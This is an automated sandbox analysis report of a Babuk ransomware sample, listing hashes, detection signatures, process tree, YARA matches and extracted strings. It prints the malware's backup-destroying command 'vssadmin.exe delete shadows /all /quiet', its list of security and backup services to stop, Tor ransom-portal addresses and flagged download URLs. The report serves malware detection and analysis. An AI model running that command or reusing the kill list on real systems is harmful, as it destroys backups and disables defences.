Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report babuk_v5

Overview

General Information

Sample Name:babuk_v5 (renamed file extension from none to exe)
Analysis ID:347507
MD5:67e49cfcd12103b5ef2f9f331f092dbe
SHA1:72cad5a81ce546b42844b5b8fc2ab55e99f2b5d4
SHA256:58ccba4fb2b3ed8b5f92adddd6ee331a6afdedfc755145e0432a7cb324c28053

Most interesting Screenshot:

Detection

Babuk
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Babuk Ransomware
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Modifies existing user documents (likely ransomware behavior)
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • babuk_v5.exe (PID: 4984 cmdline: 'C:\Users\user\Desktop\babuk_v5.exe' MD5: 67E49CFCD12103B5EF2F9F331F092DBE)
    • cmd.exe (PID: 4712 cmdline: 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • vssadmin.exe (PID: 6528 cmdline: vssadmin.exe delete shadows /all /quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)
  • SearchUI.exe (PID: 6328 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • notepad.exe (PID: 4656 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
babuk_v5.exeDestructive_Ransomware_Gen1Detects destructive malwareFlorian Roth
  • 0xad0:$x2: delete shadows /all /quiet
babuk_v5.exeJoeSecurity_babukYara detected Babuk RansomwareJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmpJoeSecurity_babukYara detected Babuk RansomwareJoe Security
      00000001.00000003.420310947.0000000000E86000.00000004.00000001.sdmpJoeSecurity_babukYara detected Babuk RansomwareJoe Security
        00000001.00000003.421468331.0000000000E86000.00000004.00000001.sdmpJoeSecurity_babukYara detected Babuk RansomwareJoe Security
          00000001.00000003.412867169.0000000000E86000.00000004.00000001.sdmpJoeSecurity_babukYara detected Babuk RansomwareJoe Security
            00000001.00000003.411482740.0000000000E86000.00000004.00000001.sdmpJoeSecurity_babukYara detected Babuk RansomwareJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.0.babuk_v5.exe.bf0000.0.unpackDestructive_Ransomware_Gen1Detects destructive malwareFlorian Roth
              • 0xad0:$x2: delete shadows /all /quiet
              1.0.babuk_v5.exe.bf0000.0.unpackJoeSecurity_babukYara detected Babuk RansomwareJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: https://temp.sh/fVAxj/1.pngAvira URL Cloud: Label: malware
                Source: https://temp.sh/qpkLy/3.pngAvira URL Cloud: Label: malware
                Source: https://temp.sh/KAXUW/8.pngAvira URL Cloud: Label: malware
                Source: https://temp.sh/hPkTt/4.pngAvira URL Cloud: Label: malware
                Source: https://temp.sh/YzAJd/6.pngAvira URL Cloud: Label: malware
                Source: https://temp.sh/ENvac/5.pngAvira URL Cloud: Label: malware
                Source: https://temp.sh/VZRcj/2.pngAvira URL Cloud: Label: malware
                Source: https://temp.sh/eBGdx/7.pngAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted fileShow sources
                Source: babuk_v5.exeVirustotal: Detection: 77%Perma Link
                Source: babuk_v5.exeMetadefender: Detection: 51%Perma Link
                Source: babuk_v5.exeReversingLabs: Detection: 89%
                Machine Learning detection for sampleShow sources
                Source: babuk_v5.exeJoe Sandbox ML: detected

                Compliance:

                barindex
                Uses 32bit PE filesShow sources
                Source: babuk_v5.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                Source: babuk_v5.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: a);I(f,a);I);r.length>0&&t.queryToFetch&&(u=n.escapeRegex(t.queryToFetch),f=u.split(" ").map(function(n){return new RegExp("^"+n+"| "+n,"i")}),r=r.filter(function(n){return f.every(function(t){return t.test(n)})}));e=lt(r);i(e)})},getResults:function(n){return n},dataSource:"FEH",getSuggestionType:function(){return"FEH"},customCreateLocalResponseSuggestion:function(n,t){return l(n,t,{type:2,content:"&#xE81C"})},supportsEmptyQuery:!0},{getResultsContainer:function(){return a()},getResults:function(n,t){return n.then(function(n){return t?n.slice(0,t):n})},dataSource:"TOPP",getSuggestionType:function(){return"TOPL"},customGetMax:function(){return 5},customCreateLocalResponseSuggestion:function(i,r,u){return t(i,r,u,n.ScopeConfig[n.Scope.Apps].icon,i.isImmersive?i.logoBackgroundColor:undefined)},supportsEmptyQuery:!0},{getResultsContainer:function(n){return ThresholdUtilities.createPromise(function(t){var i=r?r.retrieveItemsFromCache(n.queryToFetch):[];t(i)})},getResults:function(n){return n},dataSource:"LDIC",getSuggestionType:function(n){return i(n.kind,n.extension,"FD")},maxUpTo3chars:4,maxAfter3chars:7,maxAfter8charsOrInL2ZeroInput:15,supportsEmptyQuery:!1},],g=[{getResultsContainer:function(n){return SearchAppWrapper.CortanaApp.queryFormulationView.startCommandLineQuery(n.originalQuery,"")},dataSource:"CG",getSuggestionType:function(){return"CG"},customCancellation:function(){return SearchAppWrapper.CortanaApp.queryFormulationView.cancelLastCommandLineQuery()},supportsEmptyQuery:!1},];n.LocalDataProviderDataSources=b.concat(k).concat(d).concat(g).map(function(n){return n.dataSource});var u={suggestions:[],maxedOut:!1},nt={},r,tt={"shell:RecycleBinFolder":{icon:{content:"&#xEF87",type:2},locStringKey:"RecycleBin"}};var at=["\\system32\\user.exe","\\system32\\sidebar.exe","\\system32\\at.exe","\\system32\\change.exe","\\system32\\control.exe","\\system32\\find.exe","\\system32\\net.exe","\\system32\\share.exe","\\system32\\rundll32.exe","\\system32\\append.exe","\\system32\\choice.exe","\\system32\\clip.exe","\\system32\\comp.exe","\\system32\\compact.exe","\\system32\\consent.exe","\\system32\\convert.exe","\\system32\\format.exe","\\system32\\graphics.com","\\system32\\label.exe","\\system32\\mem.exe","\\system32\\mode.com","\\system32\\more.com","\\system32\\recover.exe","\\system32\\replace.exe","\\system32\\reset.exe","\\system32\\shadow.exe","\\system32\\sort.exe","\\system32\\tree.com","\\system32\\webcam.exe","\\system32\\systemsettings.exe","\\system32\\command.com","\\system32\\tabtip.exe","\\system32\\services.exe","\\system32\\help.exe","\\system32\\where.exe","\\system32\\skydrive.exe","\\system32\\calc.exe","\\system32\\fc.exe","\\accessories\\wordpad.exe",n.config.blocklistNotepadCommand?"\\system32\\notepad.exe":null,].filter(function(n){return!!n}),it=["\\system32\\finger.exe","\\system32\\ping.exe","\\system32\\print.exe","\\system32\\shutdown.exe","\\system32\\expand.exe","\\system32\\tskill.exe","\\system32\\reg.exe","\\system3
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: z:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: x:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: v:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: t:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: r:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: p:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: n:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: l:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: j:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: h:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: f:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: b:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: y:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: w:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: u:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: s:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: q:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: o:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: m:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: k:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: i:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: g:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: e:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: c:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: a:Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\05_Pictures_taken_in_the_last_month.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\01_Music_auto_rated_at_5_stars.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\02_Music_added_in_the_last_month.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log.babykJump to behavior

                Networking:

                barindex
                Found Tor onion addressShow sources
                Source: babuk_v5.exe, 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmpString found in binary or memory: 3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ
                Source: babuk_v5.exe, 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmpString found in binary or memory: http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm
                Source: notepad.exe, 0000001B.00000002.675260160.000001F983981000.00000004.00000020.sdmpString found in binary or memory: 3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ
                Source: notepad.exe, 0000001B.00000002.675260160.000001F983981000.00000004.00000020.sdmpString found in binary or memory: http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm
                Source: babuk_v5.exeString found in binary or memory: 3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ
                Source: babuk_v5.exeString found in binary or memory: http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\How To Restore Your Files.txtJump to behavior
                Source: SearchUI.exe, 00000011.00000002.712796156.000001B143010000.00000004.00000001.sdmpString found in binary or memory: www.bing.www.yahoo.u cn.bing. equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: cdn.onenote.net
                Source: babuk_v5.exeString found in binary or memory: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ
                Source: SearchUI.exe, 00000011.00000003.451558220.000001A93FED6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: SearchUI.exe, 00000011.00000002.704667202.000001B140E00000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.712040681.000001B142E90000.00000004.00000001.sdmp, I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js.17.drString found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: babuk_v5.exeString found in binary or memory: http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm
                Source: SearchUI.exe, 00000011.00000003.451558220.000001A93FED6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: SearchUI.exe, 00000011.00000002.677865532.000001A93886C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: SearchUI.exe, 00000011.00000002.672699671.000001A938829000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/reminder
                Source: SearchUI.exe, 00000011.00000002.696639733.000001A93FE00000.00000004.00000001.sdmpString found in binary or memory: http://schemas.live.com/Web/
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: SearchUI.exe, 00000011.00000003.459517675.000001B140902000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: SearchUI.exe, 00000011.00000003.456065969.000001B140CBA000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.706769525.000001B1422E4000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: SearchUI.exe, 00000011.00000002.708598713.000001B142840000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.685558645.000001A9389AF000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/news/feed?market=en-us&query=
                Source: SearchUI.exe, 00000011.00000002.703728859.000001B140CC7000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
                Source: SearchUI.exe, 00000011.00000002.703728859.000001B140CC7000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
                Source: SearchUI.exe, 00000011.00000002.704578402.000001B140DE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.local/MT
                Source: SearchUI.exe, 00000011.00000002.704578402.000001B140DE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/s
                Source: SearchUI.exe, 00000011.00000002.707875480.000001B142720000.00000004.00000001.sdmpString found in binary or memory: https://mths.be/fromcodepoint
                Source: SearchUI.exe, 00000011.00000002.709729722.000001B1429F0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com
                Source: SearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/
                Source: SearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
                Source: SearchUI.exe, 00000011.00000002.712796156.000001B143010000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000003.452654017.000001B140D6C000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
                Source: SearchUI.exe, 00000011.00000002.672699671.000001A938829000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/profile.asmxoftwar
                Source: SearchUI.exe, 00000011.00000003.508288648.000001B142316000.00000004.00000001.sdmpString found in binary or memory: https://storage.live.com/items/
                Source: SearchUI.exe, 00000011.00000003.452654017.000001B140D6C000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.708176109.000001B1427C0000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
                Source: SearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
                Source: SearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/profile/v0/users/
                Source: SearchUI.exe, 00000011.00000002.708451727.000001B142813000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api57341440-EA20-4A85-AF77-C9360B3CE8053B199897-A63E-44DC-BF20-D
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/ENvac/5.png
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/KAXUW/8.png
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/KAXUW/8.png.babykCan
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/VZRcj/2.png
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/YzAJd/6.png
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/eBGdx/7.png
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/fVAxj/1.png
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/hPkTt/4.png
                Source: babuk_v5.exeString found in binary or memory: https://temp.sh/qpkLy/3.png
                Source: SearchUI.exe, 00000011.00000002.706408689.000001B1421C0000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/news?ocid=
                Source: SearchUI.exe, 00000011.00000002.696639733.000001A93FE00000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/spartan/dhp
                Source: SearchUI.exe, 00000011.00000002.696639733.000001A93FE00000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/spartan/ntp
                Source: babuk_v5.exeString found in binary or memory: https://www.torproject.org/download/
                Source: SearchUI.exe, 00000011.00000002.712796156.000001B143010000.00000004.00000001.sdmpString found in binary or memory: https://www.yandex.www.baidu.B
                Source: SearchUI.exe, 00000011.00000002.704578402.000001B140DE4000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
                Source: SearchUI.exe, 00000011.00000002.704578402.000001B140DE4000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/P

                Spam, unwanted Advertisements and Ransom Demands:

                barindex
                Yara detected Babuk RansomwareShow sources
                Source: Yara matchFile source: babuk_v5.exe, type: SAMPLE
                Source: Yara matchFile source: 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.420310947.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.421468331.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.412867169.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.411482740.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.421137860.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.411862150.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.419959542.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.374612389.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.418775876.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.412100680.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.419289818.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: babuk_v5.exe PID: 4984, type: MEMORY
                Source: Yara matchFile source: 1.0.babuk_v5.exe.bf0000.0.unpack, type: UNPACKEDPE
                Deletes shadow drive data (may be related to ransomware)Show sources
                Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: babuk_v5.exe, 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmpBinary or memory string: vsssqlsvc$memtasmepocssophosveeambackupGxVssGxBlrGxFWDGxCVDGxCIMgrDefWatchccEvtMgrccSetMgrSavRoamRTVscanQBFCServiceQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServiceYooBackupYooITzhudongfangyusophosstc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcveeamPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobuserBackupExecManagementServiceBackupExecRPCServiceAcrSch2SvcAcronisAgentCASAD2DWebSvcCAARCUpdateSvcsql.exeoracle.exeocssd.exedbsnmp.exesynctime.exeagntsvc.exeisqlplussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefox.exetbirdconfig.exemydesktopqos.exeocomm.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exesteam.exethebat.exethunderbird.exevisio.exewinword.exewordpad.exenotepad.exeQ:\W:\E:\R:\T:\Y:\U:\I:\O:\P:\A:\S:\D:\F:\G:\H:\J:\K:\L:\Z:\X:\C:\V:\B:\N:\M:\IsWow64Processkernel32.dllkernel32.dllWow64DisableWow64FsRedirection/c vssadmin.exe delete shadows /all /quietcmd.exeopenkernel32.dllWow64RevertWow64FsRedirectionadvapi32.dllSystemFunction036%lu, Error Code: ->
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quietJump to behavior
                Source: vssadmin.exe, 00000005.00000002.352351073.0000017C5E3F0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quietvssadmin.exe delete shadows /all /quietWinsta0\Default
                Source: vssadmin.exe, 00000005.00000002.352351073.0000017C5E3F0000.00000004.00000020.sdmpBinary or memory string: vssadmin.exe delete shadows /all /quiet
                Source: vssadmin.exe, 00000005.00000002.352931999.0000017C5E745000.00000004.00000040.sdmpBinary or memory string: vssadmin.exedeleteshadows/all/quietn
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmpBinary or memory string: vssadmin Delete Shadows
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
